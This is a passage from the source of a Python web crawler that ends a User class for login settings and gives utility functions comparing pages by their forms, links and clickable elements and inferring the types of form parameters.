3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | 17 | 18 | This class contains everything, that is important for a user. It specifies, mainly the login behaviour. 19 | Notice: A crawl session(one config) can have multiple users 20 | - username - for identifying later the user 21 | - user_level - can be interesting for later comparison for different views 22 | - url_with_login_form - what can that be?? 23 | - login_data = dict, that contains mainly username and password 24 | 25 | ''' 26 | 27 | import uuid 28 | 29 | 30 | class User(): 31 | 32 | def __init__(self, username, user_level, url_with_login_form=None, login_data=None, session=uuid.uuid4()): 33 | self.login_data = login_data 34 | self.username = username 35 | self.url_with_login_form = url_with_login_form 36 | self.user_level = user_level 37 | self.session = session -------------------------------------------------------------------------------- /crawler/utils/utils.py: -------------------------------------------------------------------------------- 1 | ''' 2 | Copyright (C) 2015 Constantin Tschuertz 3 | 4 | This program is free software: you can redistribute it and/or modify 5 | it under the terms of the GNU General Public License as published by 6 | the Free Software Foundation, either version 3 of the License, or 7 | any later version. 8 | 9 | This program is distributed in the hope that it will be useful, 10 | but WITHOUT ANY WARRANTY; without even the implied warranty of 11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 12 | GNU General Public License for more details. 13 | 14 | You should have received a copy of the GNU General Public License 15 | along with this program. If not, see . 16 | ''' 17 | 18 | 19 | import logging 20 | import string 21 | from Cython.Compiler.Options import normalise_encoding_name 22 | from PyQt5.QtCore import QUrl 23 | from PyQt5.QtNetwork import QNetworkCookie 24 | 25 | from models.deltapage import DeltaPage 26 | from models.parametertype import ParameterType 27 | 28 | 29 | def form_to_dict(form, key_values = None): 30 | result = {} 31 | QStr 32 | for elem in form.parameter: 33 | if elem.name == "redirect_to": 34 | continue 35 | if elem.name not in key_values: 36 | result[elem.name] = elem.values 37 | else: 38 | result[elem.name] = key_values[elem.name] 39 | return result 40 | 41 | 42 | #substract the page-parameters in the parent-class from the delta-class 43 | def subtract_parent_from_delta_page(parent_page, delta_page): 44 | result = DeltaPage(delta_page.id, delta_page.url, delta_page.html, cookiesjar=delta_page.cookiejar, depth=delta_page.current_depth, generator=delta_page.generator, parent_id=delta_page.parent_id) 45 | result.delta_depth = delta_page.delta_depth 46 | for link in delta_page.links: 47 | if link not in parent_page.links: 48 | result.links.append(link) 49 | 50 | for d_clickable in delta_page.clickables: 51 | clickable_is_already_in_main = False 52 | for m_clickable in parent_page.clickables: 53 | if d_clickable == m_clickable: 54 | clickable_is_already_in_main = True 55 | break 56 | if clickable_is_already_in_main == False: 57 | result.clickables.append(d_clickable) 58 | 59 | for d_form in delta_page.forms: 60 | form_is_already_in_main = False 61 | for m_form in parent_page.forms: 62 | if two_forms_are_equal(d_form, m_form): 63 | form_is_already_in_main = True 64 | break 65 | if form_is_already_in_main == False: 66 | result.forms.append(d_form) 67 | 68 | result.ajax_requests = delta_page.ajax_requests # They are just capturing the new one 69 | return result 70 | 71 | def transfer_clicked_from_parent_to_delta(parent_page, delta_page): 72 | for d_clickabe in delta_page.clickables: 73 | if not d_clickabe.clicked: 74 | for p_clickable in parent_page.clickables: 75 | if d_clickabe == p_clickable: 76 | d_clickabe.clicked = p_clickable.clicked # If both are equel, transfer the clickstate from parent to child 77 | 78 | return delta_page 79 | 80 | def calculate_similarity_between_pages(page1, page2, clickable_weight = 1.0, form_weight = 1.0, link_weight = 1.0, verbose= True): 81 | 82 | if page1.toString() == page2.toString(): 83 | return 1.0 84 | 85 | form_similarity = 0.0 86 | identical_forms = 0.0 87 | form_counter = len(page1.forms) + len(page2.forms) 88 | if form_counter > 0: 89 | for p1_form in page1.forms: 90 | is_in_other = False 91 | for p2_form in page2.forms: 92 | if two_forms_are_equal(p1_form, p2_form): 93 | is_in_other = True 94 | break 95 | if is_in_other: 96 | identical_forms += 1.0 97 | form_counter -= 1.0 98 | form_similarity = identical_forms / form_counter 99 | else: 100 | form_weight = 0.0 101 | 102 | link_similarity = 0.0 103 | identical_links = 0.0 104 | link_counter = len(page1.links) + len(page2.links) 105 | if link_counter > 0: 106 | for p1_link in page1.links: 107 | is_in_other = False 108 | for p2_link in page2.links: 109 | if p1_link.url.abstract_url == p2_link.url.abstract_url: 110 | is_in_other = True 111 | break 112 | if is_in_other: 113 | identical_links += 1.0 114 | link_counter -= 1.0 115 | link_similarity = identical_links / link_counter 116 | else: 117 | #logging.debug("Linkweight is 0.0") 118 | link_weight = 0.0 119 | 120 | clickable_similarity = 0.0 121 | identical_clickables = 0.0 122 | clickable_counter = len(page1.clickables) + len(page2.clickables) 123 | if clickable_counter > 0: 124 | for p1_clickable in page1.clickables: 125 | is_in_other = False 126 | for p2_clickable in page2.clickables: 127 | if two_clickables_are_equal(p1_clickable, p2_clickable): 128 | is_in_other = True 129 | break 130 | if is_in_other: 131 | identical_clickables += 1.0 132 | clickable_counter -= 1.0 133 | clickable_similarity = identical_clickables / clickable_counter 134 | else: 135 | clickable_weight = 0 136 | 137 | sum_weight = clickable_weight + form_weight + link_weight 138 | similarity= clickable_weight * clickable_similarity + form_weight * form_similarity + link_weight * link_similarity 139 | if sum_weight > 0: 140 | result = similarity / sum_weight 141 | else: 142 | result = 1 143 | if verbose: 144 | f = open("similarities/" + str(page1.id) + " - " + str(page2.id) + ".txt", "w") 145 | f.write(page1.toString()) 146 | f.write(" \n \n ======================================================= \n \n") 147 | f.write(page2.toString()) 148 | f.write("\n \n ====================Result=========================== \n \n") 149 | f.write("Similarity = " + str(result) + " - Formsimilarity: " + str(form_similarity) + " - Linksimilarity: " + str(link_similarity) + " - Clickablesimilarity: " + str(clickable_similarity)) 150 | f.write("\n Formweight: "+ str(form_weight) + " Formnum: " +str(form_counter) + " - Linkweight: " + str(link_weight) + " Linknum: " + str(link_counter) + " - Clickableweight: " + str(clickable_weight) + " Clickablenum: " + str(clickable_counter) ) 151 | f.close() 152 | #logging.debug("PageID: " + str(page1.id) + " and PageID: " + str(page2.id) + " has a similarity from: " + str(result)) 153 | 154 | return result 155 | 156 | def two_clickables_are_equal(c1, c2): 157 | tmp = c1.event == c2.event and c1.dom_address == c2.dom_address and c1.tag == c2.tag 158 | if c1.clickable_type is not None and c2.clickable_type is not None: 159 | tmp = tmp and c1.clickable_type == c2.clickable_type 160 | return tmp 161 | 162 | def two_forms_are_equal(form1, form2): 163 | return form1.form_hash == form2.form_hash and form1.action.abstract_url == form2.action.abstract_url 164 | 165 | def count_cookies(networkaccess_manager, url): 166 | try: 167 | url = url.toString() 168 | except AttributeError: 169 | url = url 170 | cookiejar = networkaccess_manager.cookieJar() 171 | all_cookies = cookiejar.cookiesForUrl(QUrl(url)) 172 | return len(all_cookies) 173 | 174 | 175 | 176 | def calculate_new_parameter_type(current_type, value): 177 | if current_type is None: # When we see it the first time, then we just set this param to None 178 | if len(value) == 1: 179 | if value in string.ascii_lowercase + string.ascii_uppercase + "/": 180 | return ParameterType.Char 181 | elif _is_int(value): 182 | return ParameterType.Digit 183 | elif _is_float(value): 184 | return ParameterType.Float 185 | else: 186 | raise ValueError("Len is one but I have not specified a case for: {}".format(value)) 187 | else: 188 | if _is_int(value): 189 | return ParameterType.Integer 190 | elif _is_float(value): 191 | return ParameterType.Float 192 | elif isinstance(value, str): 193 | if _has_number(value): 194 | return ParameterType.AlphaNumerical 195 | else: 196 | return ParameterType.String 197 | else: 198 | raise ValueError("Is ling but not specified...") 199 | 200 | else: 201 | if current_type == ParameterType.Digit: 202 | return _handle_digit(value) 203 | elif current_type == ParameterType.Float: 204 | return _handle_float(value) 205 | elif current_type == ParameterType.Char: 206 | return _handle_char(value) 207 | elif current_type == ParameterType.Integer: 208 | return _handle_integer(value) 209 | elif current_type == ParameterType.String: 210 | return _handle_string(value) 211 | else: 212 | return ParameterType.AlphaNumerical # One time alphanumerical everytime alphanumerical 213 | 214 | 215 | def _is_int(value): 216 | try: 217 | int(value) 218 | return True 219 | except ValueError: 220 | return False 221 | 222 | def _is_float(value): 223 | try: 224 | float(value) 225 | return True 226 | except ValueError: 227 | return False 228 | 229 | def _has_number(input): 230 | return any(_is_int(char) or _is_float(char) for char in input) 231 | 232 | def _handle_digit(value): 233 | if len(value) == 1: 234 | if _is_int(value): 235 | return ParameterType.Digit 236 | if _is_float(value): 237 | return ParameterType.Float 238 | if value in string.ascii_uppercase + string.ascii_lowercase: 239 | return ParameterType.Char 240 | else: 241 | if _is_int(value): 242 | return ParameterType.Integer 243 | if _is_float(value): 244 | return ParameterType.Float 245 | else: 246 | return ParameterType.AlphaNumerical 247 | 248 | def _handle_float(value): 249 | if _is_float(value) or _is_int(value): 250 | return ParameterType.Float 251 | if isinstance(value, str): 252 | return ParameterType.AlphaNumerical 253 | else: 254 | raise ValueError("{}".format(value)) 255 | 256 | 257 | def _handle_char(value): 258 | if len(value) == 1: 259 | return ParameterType.Char 260 | else: 261 | return ParameterType.AlphaNumerical 262 | 263 | def _handle_integer(value): 264 | if _is_int(value): 265 | return ParameterType.Integer 266 | elif _is_float(value): 267 | return ParameterType.Float 268 | else: 269 | return ParameterType.AlphaNumerical 270 | 271 | def _handle_string(value): 272 | if _has_number(value): 273 | return ParameterType.AlphaNumerical 274 | else: 275 | return ParameterType.String 276 | 277 | def print_to_file(self, item, filename): 278 | f = open("result/"+filename, "w") 279 | f.write(item) 280 | f.close() --------------------------------------------------------------------------------